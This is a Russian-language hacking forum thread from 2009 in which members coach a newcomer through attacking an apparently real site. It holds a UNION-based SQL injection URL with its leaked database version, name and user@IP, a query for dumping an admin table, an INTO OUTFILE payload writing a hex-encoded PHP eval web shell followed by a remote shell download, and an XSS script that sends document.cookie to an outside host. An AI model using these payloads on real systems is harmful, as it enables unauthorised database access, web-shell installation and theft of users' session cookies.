HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.11.2009, 00:46
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Цитата:
Сообщение от B1t.exe  
получаеться все? не получиться раскрутить это?
Если IE обрезает, xss может действовать в других браузерах.
 
Ответить с цитированием

  #2  
Старый 21.11.2009, 01:43
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Цитата:
Сообщение от Shaitan-Devil  
Если IE обрезает, xss может действовать в других браузерах.
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
 
Ответить с цитированием

  #3  
Старый 21.11.2009, 01:47
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от B1t.exe  
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
Ну тут скуля, тебе ж уже отписали выше

http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(0x27,concat_ws(0x2F,version(),database(),user ()))+from+admin+limit+0,1--+

4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223

Подбирай названия столбцов таблицы admin

Последний раз редактировалось ElteRUS; 21.11.2009 в 01:56..
 
Ответить с цитированием

  #4  
Старый 21.11.2009, 02:29
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

ElteRUS

ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''

Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)

а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?

а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
 
Ответить с цитированием

  #5  
Старый 21.11.2009, 03:29
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

с именами колонок в 4 версии туговато, квазар читает тему если что подправит наверно), а вообще, можно выводить данные не зная имена колонок,
Цитата:
/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1
где то мы разбирали это
 
Ответить с цитированием

  #6  
Старый 21.11.2009, 04:09
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

Цитата:
Сообщение от B1t.exe  
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Ты не видишь в какой они последовательности написанны при sql инъекции? И что тут не понятного...

Цитата:
Сообщение от B1t.exe  
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
Быть может они предположили и попробовали?! Такой метод называется ручной брут...

Цитата:
Сообщение от B1t.exe  
получается, что blind SQL ?
Какой ещё блайнд? Вывод на месте...

Цитата:
Сообщение от B1t.exe  
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
 
Ответить с цитированием

  #7  
Старый 21.11.2009, 06:17
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от B1t.exe  
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес
Код:
212.193.224.223
и имя пользователя, используемого при коннекте
Код:
cctvline_cctv
Цитата:
Сообщение от B1t.exe  
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)
 
Ответить с цитированием

  #8  
Старый 21.11.2009, 10:54
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от B1t.exe  
ElteRUS

ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''

Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)

а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?

а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Если file_priv = Y.
Найди полный путь.
Потому
То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,0x3C3F206576616C28245F524 551554553545B635D293B203F3E,null,null+INTO+OUTFILE +'/полный/путь/inaex.php'--+

Далее если всё норм.
Нужно allow_url_fopen = on.

Цитата:
?с=copy($_GET[a], $_GET[b]);&a=http://site/shell.txt&b=inbex.php

(Да да inbex.php)
 
Ответить с цитированием

  #9  
Старый 21.11.2009, 09:18
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594

Репутация: 15
По умолчанию

Во многих статьях идет описания ворования куков с помощью xss.
Я как бы нашел все но вот уже часа 2 не догоняю что делает картинка 1x1px и куда сохрянятся куки? во многих статьях написанно про картинку
Цитата:
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
а что она делает? куда куки сохранятся?
 
Ответить с цитированием

  #10  
Старый 21.11.2009, 10:32
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию

можно ли в joomla 1.0.15 залить шелл при условии, что компоненты ставить нельзя, php= safe mode? установленных бажных компонентов на первый взгляд нет, вход в админку имеется
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.